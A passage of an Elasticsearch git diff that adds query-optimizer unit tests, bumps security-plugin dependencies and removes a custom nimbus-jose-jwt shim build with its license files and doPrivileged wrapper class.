Equals(EMPTY, fa, TEXT_A), new Equals(EMPTY, fa, TEXT_B)); + Expression e = new ValidateableCombineDisjunctionsToIn().rule(or); + assertEquals(or, e); + } + + public void testDontCombineForIncompatibleFieldType() throws Exception { + FieldAttribute fa = TestUtils.getFieldAttribute("boolean", BOOLEAN); + + Or or = new Or(EMPTY, new Equals(EMPTY, fa, ONE), new Equals(EMPTY, fa, TWO)); + Expression e = new ValidateableCombineDisjunctionsToIn().rule(or); + assertEquals(or, e); + } + + public void testDontCombineTwoCompatibleAndOneIncompatible() throws Exception { + FieldAttribute fa = getFieldAttribute(); + + Or firstOr = new Or(EMPTY, new Equals(EMPTY, fa, ONE), new Equals(EMPTY, fa, TWO)); + Or secondOr = new Or(EMPTY, firstOr, new Equals(EMPTY, fa, TEXT_A)); + Expression e = new ValidateableCombineDisjunctionsToIn().rule(secondOr); + assertEquals(secondOr, e); + } + + public void testDontCombineOneIncompatibleEqualsWithCompatibleIn() throws Exception { + FieldAttribute fa = getFieldAttribute(); + + Or or = new Or(EMPTY, new In(EMPTY, fa, List.of(ONE, TWO)), new Equals(EMPTY, fa, TEXT_A)); + Expression e = new ValidateableCombineDisjunctionsToIn().rule(or); + assertEquals(or, e); + } + + public void testDontCombineTwoIncompatibleIns1() throws Exception { + FieldAttribute fa = getFieldAttribute(); + + Or or = new Or(EMPTY, new In(EMPTY, fa, List.of(ONE, TWO)), new In(EMPTY, fa, List.of(TEXT_A, TEXT_B, TEXT_C))); + Expression e = new ValidateableCombineDisjunctionsToIn().rule(or); + assertEquals(or, e); + } + + public void testDontCombineTwoIncompatibleIns2() throws Exception { + 
FieldAttribute fa = getFieldAttribute(); + + Or or = new Or(EMPTY, new In(EMPTY, fa, List.of(ONE)), new In(EMPTY, fa, List.of(TEXT_A))); + Expression e = new ValidateableCombineDisjunctionsToIn().rule(or); + assertEquals(or, e); + } + + public void testDontCombineTwoIncompatibleIns3() throws Exception { + FieldAttribute fa1 = TestUtils.getFieldAttribute("field1"); + FieldAttribute fa2 = TestUtils.getFieldAttribute("field2"); + + Or or = new Or(EMPTY, new In(EMPTY, fa1, List.of(ONE, TWO)), new In(EMPTY, fa2, List.of(THREE, FOUR))); + Expression e = new ValidateableCombineDisjunctionsToIn().rule(or); + assertEquals(or, e); + } + + public void testDontCombineIncompatibleInWithTwoCompatibleEquals() throws Exception { + FieldAttribute fa = getFieldAttribute(); + + Or firstOr = new Or(EMPTY, new In(EMPTY, fa, List.of(TEXT_A, TEXT_B)), new Equals(EMPTY, fa, THREE)); + Or secondOr = new Or(EMPTY, firstOr, new Equals(EMPTY, fa, FOUR)); + Expression e = new ValidateableCombineDisjunctionsToIn().rule(secondOr); + assertEquals(secondOr, e); + } + + public void testCombineOnlyEqualsExpressions() throws Exception { + FieldAttribute faIn = TestUtils.getFieldAttribute("field_for_in"); + FieldAttribute faEquals = TestUtils.getFieldAttribute("field_for_equals"); + + Or firstOr = new Or(EMPTY, new In(EMPTY, faIn, List.of(ONE, TWO)), new Equals(EMPTY, faEquals, THREE)); + Or secondOr = new Or(EMPTY, firstOr, new Equals(EMPTY, faEquals, FOUR)); + Expression e = new ValidateableCombineDisjunctionsToIn().rule(secondOr); assertEquals(Or.class, e.getClass()); Or or = (Or) e; - assertEquals(or.left(), firstOr.right()); + assertEquals(or.left(), firstOr.left()); assertEquals(In.class, or.right().getClass()); In in = (In) or.right(); - assertEquals(fa, in.value()); - assertThat(in.list(), contains(ONE, THREE)); + assertEquals(faEquals, in.value()); + assertThat(in.list(), contains(THREE, FOUR)); + } + + public void testCombineOnlyCompatibleEqualsExpressions() throws Exception { + FieldAttribute faEquals1 = TestUtils.getFieldAttribute("field_for_equals1"); + FieldAttribute faEquals2 = TestUtils.getFieldAttribute("field_for_equals2"); + + Equals equalsA = new Equals(EMPTY, faEquals2, TEXT_A); + Equals equalsB = new Equals(EMPTY, faEquals2, TEXT_B); + Or firstOr = new Or(EMPTY, new Equals(EMPTY, faEquals1, ONE), equalsA); + Or secondOr = new Or(EMPTY, firstOr, new Equals(EMPTY, faEquals1, TWO)); + Or thirdOr = new Or(EMPTY, secondOr, equalsB); + + Expression e = new ValidateableCombineDisjunctionsToIn().rule(thirdOr); + assertEquals(Or.class, e.getClass()); + Or or = (Or) e; + assertEquals(In.class, or.left().getClass()); + In in = (In) or.left(); + assertThat(in.list(), contains(ONE, TWO)); + + assertEquals(Or.class, or.right().getClass()); + or = (Or) or.right(); + assertEquals(or.left(), equalsA); + assertEquals(or.right(), equalsB); + } + + public void testCombineTwoCompatiblePairsOrEqualsExpressions() throws Exception { + FieldAttribute faEquals1 = TestUtils.getFieldAttribute("field_for_equals1"); + FieldAttribute faEquals2 = TestUtils.getFieldAttribute("field_for_equals2"); + + Or firstOr = new Or(EMPTY, new Equals(EMPTY, faEquals1, ONE), new Equals(EMPTY, faEquals2, THREE)); + Or secondOr = new Or(EMPTY, firstOr, new Equals(EMPTY, faEquals1, TWO)); + Or thirdOr = new Or(EMPTY, secondOr, new Equals(EMPTY, faEquals2, FOUR)); + + Expression e = new ValidateableCombineDisjunctionsToIn().rule(thirdOr); + assertEquals(Or.class, e.getClass()); + Or or = (Or) e; + assertEquals(In.class, or.left().getClass()); + In in = 
(In) or.left(); + assertThat(in.list(), contains(ONE, TWO)); + + assertEquals(In.class, or.right().getClass()); + in = (In) or.right(); + assertThat(in.list(), contains(THREE, FOUR)); } // Null folding diff --git a/x-pack/plugin/rank-rrf/src/yamlRestTest/resources/rest-api-spec/test/rrf/950_pinned_interaction.yml b/x-pack/plugin/rank-rrf/src/yamlRestTest/resources/rest-api-spec/test/rrf/950_pinned_interaction.yml index e5629b7715994..bbdc7aff43b69 100644 --- a/x-pack/plugin/rank-rrf/src/yamlRestTest/resources/rest-api-spec/test/rrf/950_pinned_interaction.yml +++ b/x-pack/plugin/rank-rrf/src/yamlRestTest/resources/rest-api-spec/test/rrf/950_pinned_interaction.yml @@ -80,7 +80,7 @@ setup: - standard: query: - match: { text: "document" } + match_none: {} - pinned: ids: ["doc4", "doc5"] @@ -90,9 +90,6 @@ setup: match: { text: "document" } - match: { hits.total.value: 5 } - - match: { hits.hits.0._id: doc1 } - - lt: { hits.hits.0._score: 100.0 } - - match: { hits.hits.1._id: doc4 } - - match: { hits.hits.2._id: doc5 } - + - match: { hits.hits.0._id: doc4 } + - match: { hits.hits.1._id: doc5 } diff --git a/x-pack/plugin/search-business-rules/src/main/java/org/elasticsearch/xpack/searchbusinessrules/PinnedQueryBuilder.java b/x-pack/plugin/search-business-rules/src/main/java/org/elasticsearch/xpack/searchbusinessrules/PinnedQueryBuilder.java index 4b2d48ca1eaac..a4459811cc37d 100644 --- a/x-pack/plugin/search-business-rules/src/main/java/org/elasticsearch/xpack/searchbusinessrules/PinnedQueryBuilder.java +++ b/x-pack/plugin/search-business-rules/src/main/java/org/elasticsearch/xpack/searchbusinessrules/PinnedQueryBuilder.java @@ -14,7 +14,6 @@ import org.apache.lucene.search.Query; import org.apache.lucene.util.NumericUtils; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -288,6 +287,6 @@ protected boolean doEquals(PinnedQueryBuilder other) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/searchable-snapshots/src/internalClusterTest/java/org/elasticsearch/xpack/searchablesnapshots/SearchableSnapshotsCanMatchOnCoordinatorIntegTests.java b/x-pack/plugin/searchable-snapshots/src/internalClusterTest/java/org/elasticsearch/xpack/searchablesnapshots/SearchableSnapshotsCanMatchOnCoordinatorIntegTests.java index 50e58befc4a0e..2a9ae3035ae9e 100644 --- a/x-pack/plugin/searchable-snapshots/src/internalClusterTest/java/org/elasticsearch/xpack/searchablesnapshots/SearchableSnapshotsCanMatchOnCoordinatorIntegTests.java +++ b/x-pack/plugin/searchable-snapshots/src/internalClusterTest/java/org/elasticsearch/xpack/searchablesnapshots/SearchableSnapshotsCanMatchOnCoordinatorIntegTests.java @@ -1323,7 +1323,7 @@ private static IndexMetadata getIndexMetadata(String indexName) { .index(indexName); } - private void waitUntilAllShardsAreUnassigned(Index index) throws Exception { + private void waitUntilAllShardsAreUnassigned(Index index) { awaitClusterState(state -> state.getRoutingTable().index(index).allPrimaryShardsUnassigned()); } diff --git a/x-pack/plugin/searchable-snapshots/src/main/plugin-metadata/entitlement-policy.yaml b/x-pack/plugin/searchable-snapshots/src/main/plugin-metadata/entitlement-policy.yaml index 69eead6707114..d21ee299b832d 100644 --- 
a/x-pack/plugin/searchable-snapshots/src/main/plugin-metadata/entitlement-policy.yaml +++ b/x-pack/plugin/searchable-snapshots/src/main/plugin-metadata/entitlement-policy.yaml @@ -6,3 +6,6 @@ org.elasticsearch.searchablesnapshots: - relative_path: indices relative_to: data mode: read_write + - relative_path: "" + relative_to: shared_data + mode: read_write diff --git a/x-pack/plugin/security/build.gradle b/x-pack/plugin/security/build.gradle index 987e489fbf09f..a060404b0cff0 100644 --- a/x-pack/plugin/security/build.gradle +++ b/x-pack/plugin/security/build.gradle @@ -81,20 +81,13 @@ dependencies { // Dependencies for oidc api "com.nimbusds:oauth2-oidc-sdk:11.22.2" runtimeOnly "com.nimbusds:content-type:2.3" - api project(path: xpackModule('security:lib:nimbus-jose-jwt-modified'), configuration: 'shadow') - if (isEclipse) { - /* - * Eclipse can't pick up the shadow dependency so we point it at the unmodified version of the library - * so it can compile things. - */ - api "com.nimbusds:nimbus-jose-jwt:10.0.2" - } + api "com.nimbusds:nimbus-jose-jwt:10.0.2" api "com.nimbusds:lang-tag:1.7" - api "com.sun.mail:jakarta.mail:1.6.3" + api "com.sun.mail:jakarta.mail:1.6.8" api "net.jcip:jcip-annotations:1.0" api "net.minidev:json-smart:2.5.2" api "net.minidev:accessors-smart:2.5.2" - api "org.ow2.asm:asm:9.7.1" + api "org.ow2.asm:asm:9.8" testImplementation "org.elasticsearch:mocksocket:${versions.mocksocket}" @@ -174,9 +167,10 @@ tasks.named("processTestResources").configure { from(project(xpackModule('core')).file('src/test/resources')) } -artifacts { + +tasks.named('assemble').configure { // normal ES plugins do not publish the jar, but we need to since users need it for extensions - archives tasks.named("jar") + dependsOn tasks.named('jar') } tasks.named("dependencyLicenses").configure { @@ -185,6 +179,7 @@ mapping from: /bc.*/, to: 'bouncycastle' mapping from: /failureaccess.*/, to: 'guava' mapping from: 'content-type', to: 'nimbus' + mapping from: /nimbus.*/, to: 'nimbus' } tasks.named("forbiddenPatterns").configure { @@ -387,6 +382,16 @@ tasks.named("thirdPartyAudit").configure { 'org.bouncycastle.util.Arrays', 'org.bouncycastle.util.io.Streams', 'org.bouncycastle.cert.X509CertificateHolder', + // missing classes linked by nimbus + 'com.google.crypto.tink.subtle.Ed25519Sign', + 'com.google.crypto.tink.subtle.Ed25519Sign$KeyPair', + 'com.google.crypto.tink.subtle.Ed25519Verify', + 'com.google.crypto.tink.subtle.X25519', + 'com.google.crypto.tink.subtle.XChaCha20Poly1305', + 'org.bouncycastle.cert.jcajce.JcaX509CertificateHolder', + 'org.bouncycastle.openssl.PEMKeyPair', + 'org.bouncycastle.openssl.PEMParser', + 'org.bouncycastle.openssl.jcajce.JcaPEMKeyConverter' ) ignoreViolations( diff --git a/x-pack/plugin/security/lib/build.gradle b/x-pack/plugin/security/lib/build.gradle deleted file mode 100644 index 7bc94f348e781..0000000000000 --- a/x-pack/plugin/security/lib/build.gradle +++ /dev/null @@ -1,13 +0,0 @@ -// This build deserves an explanation. Nimbus-jose-jwt uses gson internally, which is unfriendly -// to our usage of the security manager, to a degree that it makes the library extremely difficult -// to work with safely. The purpose of this build is to create a version of nimbus-jose-jwt with -// a couple of classes replaced with wrappers that work with the security manager, using the source files -// in this directory. 
- -// Because we want to include the original class files so that we can reference them without -// modification, there are a couple intermediate steps: -// nimbus-jose-jwt-modified-part1: Create a version of the JAR in which the relevant class files are moved to a different package. -// This is not immediately usable as this process rewrites the rest of the JAR to "correctly" reference the new classes. So, we need to... -// nimbus-jose-jwt-modified-part2: Create a JAR from the result of part 1 which contains *only* the relevant class files by removing everything else. -// nimbus-jose-jwt-modified: Use the result of part 2 here, combined with the original library, so that we can use our -// replacement classes which wrap the original class files. diff --git a/x-pack/plugin/security/lib/nimbus-jose-jwt-modified-part1/build.gradle b/x-pack/plugin/security/lib/nimbus-jose-jwt-modified-part1/build.gradle deleted file mode 100644 index 4855a9286a7eb..0000000000000 --- a/x-pack/plugin/security/lib/nimbus-jose-jwt-modified-part1/build.gradle +++ /dev/null @@ -1,29 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -apply plugin: 'elasticsearch.build' -apply plugin: 'com.gradleup.shadow' - -// See the build.gradle file in the parent directory for an explanation of this unusual build - -dependencies { - implementation "com.nimbusds:nimbus-jose-jwt:10.0.2" -} - -tasks.named('shadowJar').configure { - // Attempting to exclude all of the classes we *don't* move here ought to be possible per the - // shadowJar docs, but actually attempting to do so results in an empty JAR. May be a bug in the shadowJar plugin. - relocate 'com.nimbusds.jose.util.JSONObjectUtils', 'org.elasticsearch.nimbus.jose.util.JSONObjectUtils' - relocate 'com.nimbusds.jose.util.JSONStringUtils', 'org.elasticsearch.nimbus.jose.util.JSONStringUtils' -} - -['jarHell', 'thirdPartyAudit', 'forbiddenApisMain', 'splitPackagesAudit', 'licenseHeaders'].each { - tasks.named(it).configure { - enabled = false - } -} - diff --git a/x-pack/plugin/security/lib/nimbus-jose-jwt-modified-part1/licenses/nimbus-jose-jwt-LICENSE.txt b/x-pack/plugin/security/lib/nimbus-jose-jwt-modified-part1/licenses/nimbus-jose-jwt-LICENSE.txt deleted file mode 100644 index d645695673349..0000000000000 --- a/x-pack/plugin/security/lib/nimbus-jose-jwt-modified-part1/licenses/nimbus-jose-jwt-LICENSE.txt +++ /dev/null @@ -1,202 +0,0 @@ - - Apache License - Version 2.0, January 2004 - http://www.apache.org/licenses/ - - TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION - - 1. Definitions. - - "License" shall mean the terms and conditions for use, reproduction, - and distribution as defined by Sections 1 through 9 of this document. - - "Licensor" shall mean the copyright owner or entity authorized by - the copyright owner that is granting the License. - - "Legal Entity" shall mean the union of the acting entity and all - other entities that control, are controlled by, or are under common - control with that entity. For the purposes of this definition, - "control" means (i) the power, direct or indirect, to cause the - direction or management of such entity, whether by contract or - otherwise, or (ii) ownership of fifty percent (50%) or more of the - outstanding shares, or (iii) beneficial ownership of such entity. 
- - "You" (or "Your") shall mean an individual or Legal Entity - exercising permissions granted by this License. - - "Source" form shall mean the preferred form for making modifications, - including but not limited to software source code, documentation - source, and configuration files. - - "Object" form shall mean any form resulting from mechanical - transformation or translation of a Source form, including but - not limited to compiled object code, generated documentation, - and conversions to other media types. - - "Work" shall mean the work of authorship, whether in Source or - Object form, made available under the License, as indicated by a - copyright notice that is included in or attached to the work - (an example is provided in the Appendix below). - - "Derivative Works" shall mean any work, whether in Source or Object - form, that is based on (or derived from) the Work and for which the - editorial revisions, annotations, elaborations, or other modifications - represent, as a whole, an original work of authorship. For the purposes - of this License, Derivative Works shall not include works that remain - separable from, or merely link (or bind by name) to the interfaces of, - the Work and Derivative Works thereof. - - "Contribution" shall mean any work of authorship, including - the original version of the Work and any modifications or additions - to that Work or Derivative Works thereof, that is intentionally - submitted to Licensor for inclusion in the Work by the copyright owner - or by an individual or Legal Entity authorized to submit on behalf of - the copyright owner. For the purposes of this definition, "submitted" - means any form of electronic, verbal, or written communication sent - to the Licensor or its representatives, including but not limited to - communication on electronic mailing lists, source code control systems, - and issue tracking systems that are managed by, or on behalf of, the - Licensor for the purpose of discussing and improving the Work, but - excluding communication that is conspicuously marked or otherwise - designated in writing by the copyright owner as "Not a Contribution." - - "Contributor" shall mean Licensor and any individual or Legal Entity - on behalf of whom a Contribution has been received by Licensor and - subsequently incorporated within the Work. - - 2. Grant of Copyright License. Subject to the terms and conditions of - this License, each Contributor hereby grants to You a perpetual, - worldwide, non-exclusive, no-charge, royalty-free, irrevocable - copyright license to reproduce, prepare Derivative Works of, - publicly display, publicly perform, sublicense, and distribute the - Work and such Derivative Works in Source or Object form. - - 3. Grant of Patent License. Subject to the terms and conditions of - this License, each Contributor hereby grants to You a perpetual, - worldwide, non-exclusive, no-charge, royalty-free, irrevocable - (except as stated in this section) patent license to make, have made, - use, offer to sell, sell, import, and otherwise transfer the Work, - where such license applies only to those patent claims licensable - by such Contributor that are necessarily infringed by their - Contribution(s) alone or by combination of their Contribution(s) - with the Work to which such Contribution(s) was submitted. 
If You - institute patent litigation against any entity (including a - cross-claim or counterclaim in a lawsuit) alleging that the Work - or a Contribution incorporated within the Work constitutes direct - or contributory patent infringement, then any patent licenses - granted to You under this License for that Work shall terminate - as of the date such litigation is filed. - - 4. Redistribution. You may reproduce and distribute copies of the - Work or Derivative Works thereof in any medium, with or without - modifications, and in Source or Object form, provided that You - meet the following conditions: - - (a) You must give any other recipients of the Work or - Derivative Works a copy of this License; and - - (b) You must cause any modified files to carry prominent notices - stating that You changed the files; and - - (c) You must retain, in the Source form of any Derivative Works - that You distribute, all copyright, patent, trademark, and - attribution notices from the Source form of the Work, - excluding those notices that do not pertain to any part of - the Derivative Works; and - - (d) If the Work includes a "NOTICE" text file as part of its - distribution, then any Derivative Works that You distribute must - include a readable copy of the attribution notices contained - within such NOTICE file, excluding those notices that do not - pertain to any part of the Derivative Works, in at least one - of the following places: within a NOTICE text file distributed - as part of the Derivative Works; within the Source form or - documentation, if provided along with the Derivative Works; or, - within a display generated by the Derivative Works, if and - wherever such third-party notices normally appear. The contents - of the NOTICE file are for informational purposes only and - do not modify the License. You may add Your own attribution - notices within Derivative Works that You distribute, alongside - or as an addendum to the NOTICE text from the Work, provided - that such additional attribution notices cannot be construed - as modifying the License. - - You may add Your own copyright statement to Your modifications and - may provide additional or different license terms and conditions - for use, reproduction, or distribution of Your modifications, or - for any such Derivative Works as a whole, provided Your use, - reproduction, and distribution of the Work otherwise complies with - the conditions stated in this License. - - 5. Submission of Contributions. Unless You explicitly state otherwise, - any Contribution intentionally submitted for inclusion in the Work - by You to the Licensor shall be under the terms and conditions of - this License, without any additional terms or conditions. - Notwithstanding the above, nothing herein shall supersede or modify - the terms of any separate license agreement you may have executed - with Licensor regarding such Contributions. - - 6. Trademarks. This License does not grant permission to use the trade - names, trademarks, service marks, or product names of the Licensor, - except as required for reasonable and customary use in describing the - origin of the Work and reproducing the content of the NOTICE file. - - 7. Disclaimer of Warranty. 
Unless required by applicable law or - agreed to in writing, Licensor provides the Work (and each - Contributor provides its Contributions) on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or - implied, including, without limitation, any warranties or conditions - of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A - PARTICULAR PURPOSE. You are solely responsible for determining the - appropriateness of using or redistributing the Work and assume any - risks associated with Your exercise of permissions under this License. - - 8. Limitation of Liability. In no event and under no legal theory, - whether in tort (including negligence), contract, or otherwise, - unless required by applicable law (such as deliberate and grossly - negligent acts) or agreed to in writing, shall any Contributor be - liable to You for damages, including any direct, indirect, special, - incidental, or consequential damages of any character arising as a - result of this License or out of the use or inability to use the - Work (including but not limited to damages for loss of goodwill, - work stoppage, computer failure or malfunction, or any and all - other commercial damages or losses), even if such Contributor - has been advised of the possibility of such damages. - - 9. Accepting Warranty or Additional Liability. While redistributing - the Work or Derivative Works thereof, You may choose to offer, - and charge a fee for, acceptance of support, warranty, indemnity, - or other liability obligations and/or rights consistent with this - License. However, in accepting such obligations, You may act only - on Your own behalf and on Your sole responsibility, not on behalf - of any other Contributor, and only if You agree to indemnify, - defend, and hold each Contributor harmless for any liability - incurred by, or claims asserted against, such Contributor by reason - of your accepting any such warranty or additional liability. - - END OF TERMS AND CONDITIONS - - APPENDIX: How to apply the Apache License to your work. - - To apply the Apache License to your work, attach the following - boilerplate notice, with the fields enclosed by brackets "[]" - replaced with your own identifying information. (Don't include - the brackets!) The text should be enclosed in the appropriate - comment syntax for the file format. We also recommend that a - file or class name and description of purpose be included on the - same "printed page" as the copyright notice for easier - identification within third-party archives. - - Copyright [yyyy] [name of copyright owner] - - Licensed under the Apache License, Version 2.0 (the "License"); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. 
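(Aside: the wrapper sources deleted further below delegate every call to the relocated copy of the original class from inside AccessController.doPrivileged, unwrapping PrivilegedActionException back into the original checked exception. A minimal self-contained sketch of that delegation idiom follows; the class and method names here are hypothetical stand-ins for illustration, not the deleted sources themselves.

import java.security.AccessController;
import java.security.PrivilegedActionException;
import java.security.PrivilegedExceptionAction;
import java.text.ParseException;
import java.util.Map;

// Hypothetical stand-in for the relocated original (the real build moves the class to
// the org.elasticsearch.nimbus.jose.util package via shadowJar's relocate).
final class RelocatedJsonUtils {
    static Map<String, Object> parse(String s) throws ParseException {
        if (s == null || s.startsWith("{") == false) {
            throw new ParseException("not a JSON object", 0);
        }
        return Map.of(); // placeholder; the real class invokes the library's JSON parser
    }
}

// Hypothetical wrapper published under the original package/class name: the API is
// unchanged, but each call runs inside doPrivileged so the library's internal gson
// usage executes with the wrapper's protection domain under the security manager.
public final class PrivilegedJsonUtils {

    public static Map<String, Object> parse(final String s) throws ParseException {
        try {
            return AccessController.doPrivileged((PrivilegedExceptionAction<Map<String, Object>>) () -> RelocatedJsonUtils.parse(s));
        } catch (PrivilegedActionException e) {
            // doPrivileged wraps checked exceptions; rethrow the original ParseException
            throw (ParseException) e.getException();
        }
    }

    private PrivilegedJsonUtils() {}
}

The deleted JSONObjectUtils wrapper below applies this same pattern to each delegated method.)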
diff --git a/x-pack/plugin/security/lib/nimbus-jose-jwt-modified-part1/licenses/nimbus-jose-jwt-NOTICE.txt b/x-pack/plugin/security/lib/nimbus-jose-jwt-modified-part1/licenses/nimbus-jose-jwt-NOTICE.txt deleted file mode 100644 index cb9ad94f662a6..0000000000000 --- a/x-pack/plugin/security/lib/nimbus-jose-jwt-modified-part1/licenses/nimbus-jose-jwt-NOTICE.txt +++ /dev/null @@ -1,14 +0,0 @@ -Nimbus JOSE + JWT - -Copyright 2012 - 2018, Connect2id Ltd. - -Licensed under the Apache License, Version 2.0 (the "License"); you may not use -this file except in compliance with the License. You may obtain a copy of the -License at - - http://www.apache.org/licenses/LICENSE-2.0 - -Unless required by applicable law or agreed to in writing, software distributed -under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR -CONDITIONS OF ANY KIND, either express or implied. See the License for the -specific language governing permissions and limitations under the License. diff --git a/x-pack/plugin/security/lib/nimbus-jose-jwt-modified-part2/build.gradle b/x-pack/plugin/security/lib/nimbus-jose-jwt-modified-part2/build.gradle deleted file mode 100644 index d24299a3847da..0000000000000 --- a/x-pack/plugin/security/lib/nimbus-jose-jwt-modified-part2/build.gradle +++ /dev/null @@ -1,26 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -apply plugin: 'elasticsearch.build' -apply plugin: 'com.gradleup.shadow' - -// See the build.gradle file in the parent directory for an explanation of this unusual build - -dependencies { - implementation project(path: xpackModule('security:lib:nimbus-jose-jwt-modified-part1'), configuration: 'shadow') -} - -tasks.named('shadowJar').configure { - // Drop everything in the original namespace, as the classes we want to modify have already been moved to another package by part 1 - exclude 'com/nimbusds/' -} - -['jarHell', 'thirdPartyAudit', 'forbiddenApisMain', 'splitPackagesAudit', 'licenseHeaders'].each { - tasks.named(it).configure { - enabled = false - } -} diff --git a/x-pack/plugin/security/lib/nimbus-jose-jwt-modified/build.gradle b/x-pack/plugin/security/lib/nimbus-jose-jwt-modified/build.gradle deleted file mode 100644 index d83788891845d..0000000000000 --- a/x-pack/plugin/security/lib/nimbus-jose-jwt-modified/build.gradle +++ /dev/null @@ -1,29 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. 
- */ - -apply plugin: 'elasticsearch.build' -apply plugin: 'com.gradleup.shadow' - -// See the build.gradle file in the parent directory for an explanation of this unusual build - -dependencies { - implementation "com.nimbusds:nimbus-jose-jwt:10.0.2" - implementation project(path: xpackModule('security:lib:nimbus-jose-jwt-modified-part2'), configuration: 'shadow') -} - -tasks.named('shadowJar').configure { - manifest { - // The original library uses this and it gets stripped by shadowJar - attributes 'Automatic-Module-Name': 'com.nimbusds.jose.jwt' - } -} - -['jarHell', 'thirdPartyAudit', 'forbiddenApisMain', 'splitPackagesAudit', 'licenseHeaders'].each { - tasks.named(it).configure { - enabled = false - } -} diff --git a/x-pack/plugin/security/lib/nimbus-jose-jwt-modified/licenses/nimbus-jose-jwt-NOTICE.txt b/x-pack/plugin/security/lib/nimbus-jose-jwt-modified/licenses/nimbus-jose-jwt-NOTICE.txt deleted file mode 100644 index cb9ad94f662a6..0000000000000 --- a/x-pack/plugin/security/lib/nimbus-jose-jwt-modified/licenses/nimbus-jose-jwt-NOTICE.txt +++ /dev/null @@ -1,14 +0,0 @@ -Nimbus JOSE + JWT - -Copyright 2012 - 2018, Connect2id Ltd. - -Licensed under the Apache License, Version 2.0 (the "License"); you may not use -this file except in compliance with the License. You may obtain a copy of the -License at - - http://www.apache.org/licenses/LICENSE-2.0 - -Unless required by applicable law or agreed to in writing, software distributed -under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR -CONDITIONS OF ANY KIND, either express or implied. See the License for the -specific language governing permissions and limitations under the License. diff --git a/x-pack/plugin/security/lib/nimbus-jose-jwt-modified/src/main/java/com/nimbusds/jose/util/JSONObjectUtils.java b/x-pack/plugin/security/lib/nimbus-jose-jwt-modified/src/main/java/com/nimbusds/jose/util/JSONObjectUtils.java deleted file mode 100644 index 34b61e612c747..0000000000000 --- a/x-pack/plugin/security/lib/nimbus-jose-jwt-modified/src/main/java/com/nimbusds/jose/util/JSONObjectUtils.java +++ /dev/null @@ -1,219 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -package com.nimbusds.jose.util; - -import java.net.URI; -import java.security.AccessController; -import java.security.PrivilegedAction; -import java.security.PrivilegedActionException; -import java.security.PrivilegedExceptionAction; -import java.text.ParseException; -import java.util.Date; -import java.util.List; -import java.util.Map; - -/** - * This class wraps {@link org.elasticsearch.nimbus.jose.util.JSONObjectUtils}, which is copied directly from the source - * library, and delegates to that class as quickly as possible. This layer is only here to provide a point at which we - * can insert {@link java.security.AccessController#doPrivileged(PrivilegedAction)} calls as necessary. We don't do - * anything here other than ensure gson has the proper security manager permissions. 
- */ -public class JSONObjectUtils { - - public static Map<String, Object> parse(final String s) throws ParseException { - try { - return AccessController.doPrivileged( - (PrivilegedExceptionAction<Map<String, Object>>) () -> org.elasticsearch.nimbus.jose.util.JSONObjectUtils.parse(s) - ); - } catch (PrivilegedActionException e) { - throw (ParseException) e.getException(); - } - } - - public static Map<String, Object> parse(final String s, final int sizeLimit) throws ParseException { - try { - return AccessController.doPrivileged( - (PrivilegedExceptionAction<Map<String, Object>>) () -> org.elasticsearch.nimbus.jose.util.JSONObjectUtils.parse( - s, - sizeLimit - ) - ); - } catch (PrivilegedActionException e) { - throw (ParseException) e.getException(); - } - } - - @Deprecated - public static Map<String, Object> parseJSONObject(final String s) throws ParseException { - try { - return AccessController.doPrivileged( - (PrivilegedExceptionAction<Map<String, Object>>) () -> org.elasticsearch.nimbus.jose.util.JSONObjectUtils.parseJSONObject(s) - ); - } catch (PrivilegedActionException e) { - throw (ParseException) e.getException(); - } - } - - public static boolean getBoolean(final Map<String, Object> o, final String key) throws ParseException { - try { - return AccessController.doPrivileged( - (PrivilegedExceptionAction<Boolean>) () -> org.elasticsearch.nimbus.jose.util.JSONObjectUtils.getBoolean(o, key) - ); - } catch (PrivilegedActionException e) { - throw (ParseException) e.getException(); - } - } - - public static int getInt(final Map<String, Object> o, final String key) throws ParseException { - try { - return AccessController.doPrivileged( - (PrivilegedExceptionAction<Integer>) () -> org.elasticsearch.nimbus.jose.util.JSONObjectUtils.getInt(o, key) - ); - } catch (PrivilegedActionException e) { - throw (ParseException) e.getException(); - } - } - - public static long getLong(final Map<String, Object> o, final String key) throws ParseException { - try { - return AccessController.doPrivileged( - (PrivilegedExceptionAction<Long>) () -> org.elasticsearch.nimbus.jose.util.JSONObjectUtils.getLong(o, key) - ); - } catch (PrivilegedActionException e) { - throw (ParseException) e.getException(); - } - } - - public static float getFloat(final Map<String, Object> o, final String key) throws ParseException { - try { - return AccessController.doPrivileged( - (PrivilegedExceptionAction<Float>) () -> org.elasticsearch.nimbus.jose.util.JSONObjectUtils.getFloat(o, key) - ); - } catch (PrivilegedActionException e) { - throw (ParseException) e.getException(); - } - } - - public static double getDouble(final Map<String, Object> o, final String key) throws ParseException { - try { - return AccessController.doPrivileged( - (PrivilegedExceptionAction<Double>) () -> 